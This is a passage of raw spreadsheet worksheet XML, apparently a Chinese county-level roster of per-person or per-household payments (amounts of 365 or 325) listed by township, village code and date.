      <c r="I1151" s="17"/>
      <c r="J1151" s="29"/>
      <c r="K1151" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1152" customHeight="1" spans="1:11">
      <c r="A1152" s="16" t="s">
        <v>3073</v>
      </c>
      <c r="B1152" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1152" s="20" t="s">
        <v>3064</v>
      </c>
      <c r="D1152" s="20" t="s">
        <v>3074</v>
      </c>
      <c r="E1152" s="20" t="s">
        <v>239</v>
      </c>
      <c r="F1152" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1152" s="17">
        <v>1</v>
      </c>
      <c r="H1152" s="18">
        <v>365</v>
      </c>
      <c r="I1152" s="17">
        <f t="shared" ref="I1152:I1161" si="59">H1152*G1152</f>
        <v>365</v>
      </c>
      <c r="J1152" s="29">
        <v>45717</v>
      </c>
      <c r="K1152" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1153" customHeight="1" spans="1:22">
      <c r="A1153" s="16" t="s">
        <v>3075</v>
      </c>
      <c r="B1153" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1153" s="20" t="s">
        <v>2841</v>
      </c>
      <c r="D1153" s="20" t="s">
        <v>3076</v>
      </c>
      <c r="E1153" s="20" t="s">
        <v>1336</v>
      </c>
      <c r="F1153" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1153" s="17">
        <v>1</v>
      </c>
      <c r="H1153" s="18">
        <v>365</v>
      </c>
      <c r="I1153" s="17">
        <f t="shared" si="59"/>
        <v>365</v>
      </c>
      <c r="J1153" s="29">
        <v>45717</v>
      </c>
      <c r="K1153" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1154" customHeight="1" spans="1:22">
      <c r="A1154" s="16" t="s">
        <v>3077</v>
      </c>
      <c r="B1154" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1154" s="20" t="s">
        <v>3078</v>
      </c>
      <c r="D1154" s="20" t="s">
        <v>3079</v>
      </c>
      <c r="E1154" s="20" t="s">
        <v>3080</v>
      </c>
      <c r="F1154" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1154" s="17">
        <v>1</v>
      </c>
      <c r="H1154" s="18">
        <v>365</v>
      </c>
      <c r="I1154" s="17">
        <f t="shared" si="59"/>
        <v>365</v>
      </c>
      <c r="J1154" s="29">
        <v>45717</v>
      </c>
      <c r="K1154" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1155" customHeight="1" spans="1:22">
      <c r="A1155" s="16" t="s">
        <v>3081</v>
      </c>
      <c r="B1155" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1155" s="20" t="s">
        <v>3082</v>
      </c>
      <c r="D1155" s="20" t="s">
        <v>3083</v>
      </c>
      <c r="E1155" s="20" t="s">
        <v>389</v>
      </c>
      <c r="F1155" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1155" s="17">
        <v>1</v>
      </c>
      <c r="H1155" s="18">
        <v>365</v>
      </c>
      <c r="I1155" s="17">
        <f t="shared" si="59"/>
        <v>365</v>
      </c>
      <c r="J1155" s="29">
        <v>45717</v>
      </c>
      <c r="K1155" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1156" customHeight="1" spans="1:22">
      <c r="A1156" s="16" t="s">
        <v>3084</v>
      </c>
      <c r="B1156" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1156" s="20" t="s">
        <v>318</v>
      </c>
      <c r="D1156" s="20" t="s">
        <v>3085</v>
      </c>
      <c r="E1156" s="20" t="s">
        <v>1968</v>
      </c>
      <c r="F1156" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1156" s="17">
        <v>1</v>
      </c>
      <c r="H1156" s="18">
        <v>365</v>
      </c>
      <c r="I1156" s="17">
        <f t="shared" si="59"/>
        <v>365</v>
      </c>
      <c r="J1156" s="29">
        <v>45717</v>
      </c>
      <c r="K1156" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1157" customHeight="1" spans="1:22">
      <c r="A1157" s="16" t="s">
        <v>3086</v>
      </c>
      <c r="B1157" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1157" s="20" t="s">
        <v>643</v>
      </c>
      <c r="D1157" s="20" t="s">
        <v>3087</v>
      </c>
      <c r="E1157" s="20" t="s">
        <v>222</v>
      </c>
      <c r="F1157" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1157" s="17">
        <v>1</v>
      </c>
      <c r="H1157" s="18">
        <v>365</v>
      </c>
      <c r="I1157" s="17">
        <f t="shared" si="59"/>
        <v>365</v>
      </c>
      <c r="J1157" s="29">
        <v>45717</v>
      </c>
      <c r="K1157" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L1157" s="1"/>
    </row>
    <row r="1158" customHeight="1" spans="1:22">
      <c r="A1158" s="16" t="s">
        <v>3088</v>
      </c>
      <c r="B1158" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1158" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1158" s="17" t="s">
        <v>3089</v>
      </c>
      <c r="E1158" s="17" t="s">
        <v>411</v>
      </c>
      <c r="F1158" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1158" s="17">
        <v>1</v>
      </c>
      <c r="H1158" s="18">
        <v>365</v>
      </c>
      <c r="I1158" s="17">
        <f t="shared" si="59"/>
        <v>365</v>
      </c>
      <c r="J1158" s="29">
        <v>45108</v>
      </c>
      <c r="K1158" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L1158" s="1"/>
      <c r="M1158" s="1"/>
      <c r="N1158" s="1"/>
      <c r="O1158" s="1"/>
      <c r="P1158" s="1"/>
      <c r="Q1158" s="1"/>
      <c r="R1158" s="1"/>
      <c r="S1158" s="1"/>
      <c r="T1158" s="1"/>
      <c r="U1158" s="1"/>
      <c r="V1158" s="1"/>
    </row>
    <row r="1159" s="1" customFormat="1" customHeight="1" spans="1:22">
      <c r="A1159" s="16" t="s">
        <v>3090</v>
      </c>
      <c r="B1159" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1159" s="20" t="s">
        <v>3091</v>
      </c>
      <c r="D1159" s="20" t="s">
        <v>3092</v>
      </c>
      <c r="E1159" s="22" t="s">
        <v>3093</v>
      </c>
      <c r="F1159" s="20" t="s">
        <v>233</v>
      </c>
      <c r="G1159" s="17">
        <v>1</v>
      </c>
      <c r="H1159" s="18">
        <v>365</v>
      </c>
      <c r="I1159" s="17">
        <f t="shared" si="59"/>
        <v>365</v>
      </c>
      <c r="J1159" s="36" t="s">
        <v>3094</v>
      </c>
      <c r="K1159" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L1159" s="2"/>
    </row>
    <row r="1160" s="1" customFormat="1" customHeight="1" spans="1:22">
      <c r="A1160" s="16" t="s">
        <v>3095</v>
      </c>
      <c r="B1160" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1160" s="20" t="s">
        <v>2037</v>
      </c>
      <c r="D1160" s="20" t="s">
        <v>3096</v>
      </c>
      <c r="E1160" s="22" t="s">
        <v>3097</v>
      </c>
      <c r="F1160" s="20" t="s">
        <v>233</v>
      </c>
      <c r="G1160" s="17">
        <v>1</v>
      </c>
      <c r="H1160" s="18">
        <v>365</v>
      </c>
      <c r="I1160" s="17">
        <f t="shared" si="59"/>
        <v>365</v>
      </c>
      <c r="J1160" s="36" t="s">
        <v>3094</v>
      </c>
      <c r="K1160" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L1160" s="3"/>
      <c r="M1160" s="2"/>
      <c r="N1160" s="2"/>
      <c r="O1160" s="2"/>
      <c r="P1160" s="2"/>
      <c r="Q1160" s="2"/>
      <c r="R1160" s="2"/>
      <c r="S1160" s="2"/>
      <c r="T1160" s="2"/>
      <c r="U1160" s="2"/>
      <c r="V1160" s="2"/>
    </row>
    <row r="1161" s="2" customFormat="1" customHeight="1" spans="1:22">
      <c r="A1161" s="16" t="s">
        <v>3098</v>
      </c>
      <c r="B1161" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1161" s="20" t="s">
        <v>3031</v>
      </c>
      <c r="D1161" s="20" t="s">
        <v>3099</v>
      </c>
      <c r="E1161" s="22" t="s">
        <v>3100</v>
      </c>
      <c r="F1161" s="20">
        <v>4113210105</v>
      </c>
      <c r="G1161" s="17">
        <v>1</v>
      </c>
      <c r="H1161" s="18">
        <v>365</v>
      </c>
      <c r="I1161" s="17">
        <f t="shared" si="59"/>
        <v>365</v>
      </c>
      <c r="J1161" s="36" t="s">
        <v>3094</v>
      </c>
      <c r="K1161" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L1161" s="3"/>
      <c r="M1161" s="3"/>
      <c r="N1161" s="3"/>
      <c r="O1161" s="3"/>
      <c r="P1161" s="3"/>
      <c r="Q1161" s="3"/>
      <c r="R1161" s="3"/>
      <c r="S1161" s="3"/>
      <c r="T1161" s="3"/>
      <c r="U1161" s="3"/>
      <c r="V1161" s="3"/>
    </row>
    <row r="1162" s="3" customFormat="1" customHeight="1" spans="1:22">
      <c r="A1162" s="16" t="s">
        <v>3101</v>
      </c>
      <c r="B1162" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1162" s="20" t="s">
        <v>286</v>
      </c>
      <c r="D1162" s="20" t="s">
        <v>3102</v>
      </c>
      <c r="E1162" s="22" t="s">
        <v>3103</v>
      </c>
      <c r="F1162" s="20" t="s">
        <v>289</v>
      </c>
      <c r="G1162" s="37">
        <v>2</v>
      </c>
      <c r="H1162" s="38">
        <v>325</v>
      </c>
      <c r="I1162" s="3">
        <v>600</v>
      </c>
      <c r="J1162" s="36" t="s">
        <v>3104</v>
      </c>
      <c r="K1162" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1163" s="3" customFormat="1" customHeight="1" spans="1:22">
      <c r="A1163" s="16" t="s">
        <v>3105</v>
      </c>
      <c r="B1163" s="17" t="str">
        <f>B1162</f>
        <v>城关镇</v>
      </c>
      <c r="C1163" s="20" t="str">
        <f>C1162</f>
        <v>北外村</v>
      </c>
      <c r="D1163" s="20" t="s">
        <v>3106</v>
      </c>
      <c r="E1163" s="20" t="s">
        <v>3107</v>
      </c>
      <c r="F1163" s="20" t="str">
        <f>F1162</f>
        <v>4113210102</v>
      </c>
      <c r="G1163" s="17"/>
      <c r="H1163" s="17"/>
      <c r="I1163" s="39"/>
      <c r="J1163" s="37"/>
      <c r="K1163" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1164" s="3" customFormat="1" customHeight="1" spans="1:22">
      <c r="A1164" s="16" t="s">
        <v>3108</v>
      </c>
      <c r="B1164" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1164" s="20" t="s">
        <v>3109</v>
      </c>
      <c r="D1164" s="20" t="s">
        <v>3110</v>
      </c>
      <c r="E1164" s="22" t="s">
        <v>239</v>
      </c>
      <c r="F1164" s="20">
        <v>4113210108</v>
      </c>
      <c r="G1164" s="17">
        <v>1</v>
      </c>
      <c r="H1164" s="18">
        <v>365</v>
      </c>
      <c r="I1164" s="17">
        <f t="shared" ref="I1164:I1171" si="60">H1164*G1164</f>
        <v>365</v>
      </c>
      <c r="J1164" s="37" t="s">
        <v>3104</v>
      </c>
      <c r="K1164" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L1164"/>
    </row>
    <row r="1165" s="3" customFormat="1" customHeight="1" spans="1:22">
      <c r="A1165" s="16" t="s">
        <v>3111</v>
      </c>
      <c r="B1165" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1165" s="20" t="s">
        <v>3109</v>
      </c>
      <c r="D1165" s="20" t="s">
        <v>3112</v>
      </c>
      <c r="E1165" s="22" t="s">
        <v>773</v>
      </c>
      <c r="F1165" s="20">
        <v>4113210108</v>
      </c>
      <c r="G1165" s="17">
        <v>1</v>
      </c>
      <c r="H1165" s="18">
        <v>365</v>
      </c>
      <c r="I1165" s="17">
        <f t="shared" si="60"/>
        <v>365</v>
      </c>
      <c r="J1165" s="37" t="s">
        <v>3104</v>
      </c>
      <c r="K1165" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L1165"/>
      <c r="M1165"/>
      <c r="N1165"/>
      <c r="O1165"/>
      <c r="P1165"/>
      <c r="Q1165"/>
      <c r="R1165"/>
      <c r="S1165"/>
      <c r="T1165"/>
      <c r="U1165"/>
      <c r="V1165"/>
    </row>
    <row r="1166" customFormat="1" customHeight="1" spans="1:22">
      <c r="A1166" s="16" t="s">
        <v>3113</v>
      </c>
      <c r="B1166" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1166" s="20" t="s">
        <v>1038</v>
      </c>
      <c r="D1166" s="20" t="s">
        <v>3114</v>
      </c>
      <c r="E1166" s="22" t="s">
        <v>3115</v>
      </c>
      <c r="F1166" s="20">
        <v>4113210103</v>
      </c>
      <c r="G1166" s="17">
        <v>1</v>
      </c>
      <c r="H1166" s="18">
        <v>365</v>
      </c>
      <c r="I1166" s="17">
        <f t="shared" si="60"/>
        <v>365</v>
      </c>
      <c r="J1166" s="40" t="s">
        <v>3104</v>
      </c>
      <c r="K1166" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L1166" s="6"/>
    </row>
    <row r="1167" customFormat="1" customHeight="1" spans="1:22">
      <c r="A1167" s="16" t="s">
        <v>3116</v>
      </c>
      <c r="B1167" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1167" s="20" t="s">
        <v>1038</v>
      </c>
      <c r="D1167" s="20" t="s">
        <v>3117</v>
      </c>
      <c r="E1167" s="22" t="s">
        <v>236</v>
      </c>
      <c r="F1167" s="20">
        <v>4113210103</v>
      </c>
      <c r="G1167" s="17">
        <v>1</v>
      </c>
      <c r="H1167" s="18">
        <v>365</v>
      </c>
      <c r="I1167" s="17">
        <f t="shared" si="60"/>
        <v>365</v>
      </c>
      <c r="J1167" s="40" t="s">
        <v>3104</v>
      </c>
      <c r="K1167" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L1167" s="6"/>
      <c r="M1167" s="6"/>
      <c r="N1167" s="6"/>
      <c r="O1167" s="6"/>
      <c r="P1167" s="6"/>
      <c r="Q1167" s="6"/>
      <c r="R1167" s="6"/>
      <c r="S1167" s="6"/>
      <c r="T1167" s="6"/>
      <c r="U1167" s="6"/>
      <c r="V1167" s="6"/>
    </row>
    <row r="1168" customHeight="1" spans="1:22">
      <c r="A1168" s="16" t="s">
        <v>3118</v>
      </c>
      <c r="B1168" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1168" s="17" t="s">
        <v>2642</v>
      </c>
      <c r="D1168" s="17" t="s">
        <v>3119</v>
      </c>
      <c r="E1168" s="17" t="s">
        <v>3120</v>
      </c>
      <c r="F1168" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G1168" s="17">
        <v>1</v>
      </c>
      <c r="H1168" s="18">
        <v>365</v>
      </c>
      <c r="I1168" s="17">
        <f t="shared" si="60"/>
        <v>365</v>
      </c>
      <c r="J1168" s="29">
        <v>45108</v>
      </c>
      <c r="K1168" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1169" customHeight="1" spans="1:11">
      <c r="A1169" s="16" t="s">
        <v>3121</v>
      </c>
      <c r="B1169" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1169" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="D1169" s="17" t="s">
        <v>3123</v>
      </c>
      <c r="E1169" s="17" t="s">
        <v>3124</v>
      </c>
      <c r="F1169" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1169" s="17">
        <v>1</v>
      </c>
      <c r="H1169" s="18">
        <v>365</v>
      </c>
      <c r="I1169" s="17">
        <f t="shared" si="60"/>
        <v>365</v>
      </c>
      <c r="J1169" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1169" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1170" customHeight="1" spans="1:11">
      <c r="A1170" s="16" t="s">
        <v>3126</v>
      </c>
      <c r="B1170" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1170" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="D1170" s="17" t="s">
        <v>3127</v>
      </c>
      <c r="E1170" s="17" t="s">
        <v>3128</v>
      </c>
      <c r="F1170" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1170" s="17">
        <v>1</v>
      </c>
      <c r="H1170" s="18">
        <v>365</v>
      </c>
      <c r="I1170" s="17">
        <f t="shared" si="60"/>
        <v>365</v>
      </c>
      <c r="J1170" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1170" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1171" customHeight="1" spans="1:11">
      <c r="A1171" s="16" t="s">
        <v>3129</v>
      </c>
      <c r="B1171" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1171" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="D1171" s="17" t="s">
        <v>3130</v>
      </c>
      <c r="E1171" s="17" t="s">
        <v>3131</v>
      </c>
      <c r="F1171" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1171" s="17">
        <v>2</v>
      </c>
      <c r="H1171" s="18">
        <v>325</v>
      </c>
      <c r="I1171" s="17">
        <f t="shared" si="60"/>
        <v>650</v>
      </c>
      <c r="J1171" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1171" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1172" customHeight="1" spans="1:11">
      <c r="A1172" s="16" t="s">
        <v>3132</v>
      </c>
      <c r="B1172" s="17" t="str">
        <f>B1171</f>
        <v>城郊乡</v>
      </c>
      <c r="C1172" s="17" t="str">
        <f>C1171</f>
        <v>城郊乡</v>
      </c>
      <c r="D1172" s="16" t="s">
        <v>3133</v>
      </c>
      <c r="E1172" s="25" t="s">
        <v>3134</v>
      </c>
      <c r="F1172" s="17" t="str">
        <f>F1171</f>
        <v>4113210299</v>
      </c>
      <c r="G1172" s="17"/>
      <c r="H1172" s="17"/>
      <c r="I1172" s="17"/>
      <c r="J1172" s="17"/>
      <c r="K1172" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1173" customHeight="1" spans="1:11">
      <c r="A1173" s="16" t="s">
        <v>3135</v>
      </c>
      <c r="B1173" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1173" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="D1173" s="17" t="s">
        <v>3136</v>
      </c>
      <c r="E1173" s="17" t="s">
        <v>3137</v>
      </c>
      <c r="F1173" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1173" s="17">
        <v>1</v>
      </c>
      <c r="H1173" s="18">
        <v>365</v>
      </c>
      <c r="I1173" s="17">
        <f>H1173*G1173</f>
        <v>365</v>
      </c>
      <c r="J1173" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1173" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1174" customHeight="1" spans="1:11">
      <c r="A1174" s="16" t="s">
        <v>3138</v>
      </c>
      <c r="B1174" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1174" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="D1174" s="17" t="s">
        <v>3139</v>
      </c>
      <c r="E1174" s="17" t="s">
        <v>3140</v>
      </c>
      <c r="F1174" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1174" s="17">
        <v>1</v>
      </c>
      <c r="H1174" s="18">
        <v>365</v>
      </c>
      <c r="I1174" s="17">
        <f>H1174*G1174</f>
        <v>365</v>
      </c>
      <c r="J1174" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1174" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1175" customHeight="1" spans="1:11">
      <c r="A1175" s="16" t="s">
        <v>3141</v>
      </c>
      <c r="B1175" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1175" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="D1175" s="17" t="s">
        <v>3142</v>
      </c>
      <c r="E1175" s="17" t="s">
        <v>617</v>
      </c>
      <c r="F1175" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1175" s="17">
        <v>1</v>
      </c>
      <c r="H1175" s="18">
        <v>365</v>
      </c>
      <c r="I1175" s="17">
        <f>H1175*G1175</f>
        <v>365</v>
      </c>
      <c r="J1175" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1175" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1176" customHeight="1" spans="1:11">
      <c r="A1176" s="16" t="s">
        <v>3143</v>
      </c>
      <c r="B1176" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1176" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="D1176" s="17" t="s">
        <v>3144</v>
      </c>
      <c r="E1176" s="17" t="s">
        <v>3145</v>
      </c>
      <c r="F1176" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1176" s="17">
        <v>1</v>
      </c>
      <c r="H1176" s="18">
        <v>365</v>
      </c>
      <c r="I1176" s="17">
        <f>H1176*G1176</f>
        <v>365</v>
      </c>
      <c r="J1176" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1176" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1177" customHeight="1" spans="1:11">
      <c r="A1177" s="16" t="s">
        <v>3146</v>
      </c>
      <c r="B1177" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1177" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="D1177" s="17" t="s">
        <v>3147</v>
      </c>
      <c r="E1177" s="17" t="s">
        <v>3148</v>
      </c>
      <c r="F1177" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1177" s="17">
        <v>2</v>
      </c>
      <c r="H1177" s="18">
        <v>325</v>
      </c>
      <c r="I1177" s="17">
        <f>H1177*G1177</f>
        <v>650</v>
      </c>
      <c r="J1177" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1177" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1178" customHeight="1" spans="1:11">
      <c r="A1178" s="16" t="s">
        <v>3149</v>
      </c>
      <c r="B1178" s="17" t="str">
        <f>B1177</f>
        <v>城郊乡</v>
      </c>
      <c r="C1178" s="17" t="str">
        <f>C1177</f>
        <v>城郊乡</v>
      </c>
      <c r="D1178" s="16" t="s">
        <v>3150</v>
      </c>
      <c r="E1178" s="16" t="s">
        <v>416</v>
      </c>
      <c r="F1178" s="17" t="str">
        <f>F1177</f>
        <v>4113210299</v>
      </c>
      <c r="G1178" s="17"/>
      <c r="H1178" s="17"/>
      <c r="I1178" s="17"/>
      <c r="J1178" s="17"/>
      <c r="K1178" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1179" customHeight="1" spans="1:11">
      <c r="A1179" s="16" t="s">
        <v>3151</v>
      </c>
      <c r="B1179" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1179" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="D1179" s="17" t="s">
        <v>3152</v>
      </c>
      <c r="E1179" s="17" t="s">
        <v>3153</v>
      </c>
      <c r="F1179" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1179" s="17">
        <v>1</v>
      </c>
      <c r="H1179" s="18">
        <v>365</v>
      </c>
      <c r="I1179" s="17">
        <f>H1179*G1179</f>
        <v>365</v>
      </c>
      <c r="J1179" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1179" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1180" customHeight="1" spans="1:11">
      <c r="A1180" s="16" t="s">
        <v>3154</v>
      </c>
      <c r="B1180" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1180" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="D1180" s="17" t="s">
        <v>3155</v>
      </c>
      <c r="E1180" s="17" t="s">
        <v>481</v>
      </c>
      <c r="F1180" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1180" s="17">
        <v>1</v>
      </c>
      <c r="H1180" s="18">
        <v>365</v>
      </c>
      <c r="I1180" s="17">
        <f>H1180*G1180</f>
        <v>365</v>
      </c>
      <c r="J1180" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1180" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1181" customHeight="1" spans="1:11">
      <c r="A1181" s="16" t="s">
        <v>3156</v>
      </c>
      <c r="B1181" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1181" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="D1181" s="17" t="s">
        <v>3157</v>
      </c>
      <c r="E1181" s="17" t="s">
        <v>3158</v>
      </c>
      <c r="F1181" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1181" s="17">
        <v>1</v>
      </c>
      <c r="H1181" s="18">
        <v>365</v>
      </c>
      <c r="I1181" s="17">
        <f>H1181*G1181</f>
        <v>365</v>
      </c>
      <c r="J1181" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1181" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1182" customHeight="1" spans="1:11">
      <c r="A1182" s="16" t="s">
        <v>3159</v>
      </c>
      <c r="B1182" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1182" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="D1182" s="17" t="s">
        <v>3160</v>
      </c>
      <c r="E1182" s="17" t="s">
        <v>2734</v>
      </c>
      <c r="F1182" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1182" s="17">
        <v>1</v>
      </c>
      <c r="H1182" s="18">
        <v>365</v>
      </c>
      <c r="I1182" s="17">
        <f>H1182*G1182</f>
        <v>365</v>
      </c>
      <c r="J1182" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1182" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1183" customHeight="1" spans="1:11">
      <c r="A1183" s="16" t="s">
        <v>3161</v>
      </c>
      <c r="B1183" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1183" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="D1183" s="17" t="s">
        <v>3162</v>
      </c>
      <c r="E1183" s="17" t="s">
        <v>3163</v>
      </c>
      <c r="F1183" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1183" s="17">
        <v>2</v>
      </c>
      <c r="H1183" s="18">
        <v>325</v>
      </c>
      <c r="I1183" s="17">
        <f>H1183*G1183</f>
        <v>650</v>
      </c>
      <c r="J1183" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1183" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1184" customHeight="1" spans="1:11">
      <c r="A1184" s="16" t="s">
        <v>3164</v>
      </c>
      <c r="B1184" s="17" t="str">
        <f>B1183</f>
        <v>城郊乡</v>
      </c>
      <c r="C1184" s="17" t="str">
        <f>C1183</f>
        <v>城郊乡</v>
      </c>
      <c r="D1184" s="16" t="s">
        <v>3165</v>
      </c>
      <c r="E1184" s="25" t="s">
        <v>3166</v>
      </c>
      <c r="F1184" s="17" t="str">
        <f>F1183</f>
        <v>4113210299</v>
      </c>
      <c r="G1184" s="17"/>
      <c r="H1184" s="17"/>
      <c r="I1184" s="17"/>
      <c r="J1184" s="17"/>
      <c r="K1184" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1185" customHeight="1" spans="1:11">
      <c r="A1185" s="16" t="s">
        <v>3167</v>
      </c>
      <c r="B1185" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1185" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="D1185" s="17" t="s">
        <v>3168</v>
      </c>
      <c r="E1185" s="17" t="s">
        <v>360</v>
      </c>
      <c r="F1185" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1185" s="17">
        <v>1</v>
      </c>
      <c r="H1185" s="18">
        <v>365</v>
      </c>
      <c r="I1185" s="17">
        <f>H1185*G1185</f>
        <v>365</v>
      </c>
      <c r="J1185" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1185" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1186" customHeight="1" spans="1:11">
      <c r="A1186" s="16" t="s">
        <v>3169</v>
      </c>
      <c r="B1186" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1186" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="D1186" s="17" t="s">
        <v>3170</v>
      </c>
      <c r="E1186" s="17" t="s">
        <v>3171</v>
      </c>
      <c r="F1186" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1186" s="17">
        <v>1</v>
      </c>
      <c r="H1186" s="18">
        <v>365</v>
      </c>
      <c r="I1186" s="17">
        <f>H1186*G1186</f>
        <v>365</v>
      </c>
      <c r="J1186" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1186" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1187" customHeight="1" spans="1:11">
      <c r="A1187" s="16" t="s">
        <v>3172</v>
      </c>
      <c r="B1187" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1187" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="D1187" s="17" t="s">
        <v>3173</v>
      </c>
      <c r="E1187" s="17" t="s">
        <v>3080</v>
      </c>
      <c r="F1187" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1187" s="17">
        <v>2</v>
      </c>
      <c r="H1187" s="18">
        <v>325</v>
      </c>
      <c r="I1187" s="17">
        <f>H1187*G1187</f>
        <v>650</v>
      </c>
      <c r="J1187" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1187" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1188" customHeight="1" spans="1:11">
      <c r="A1188" s="16" t="s">
        <v>3174</v>
      </c>
      <c r="B1188" s="17" t="str">
        <f>B1187</f>
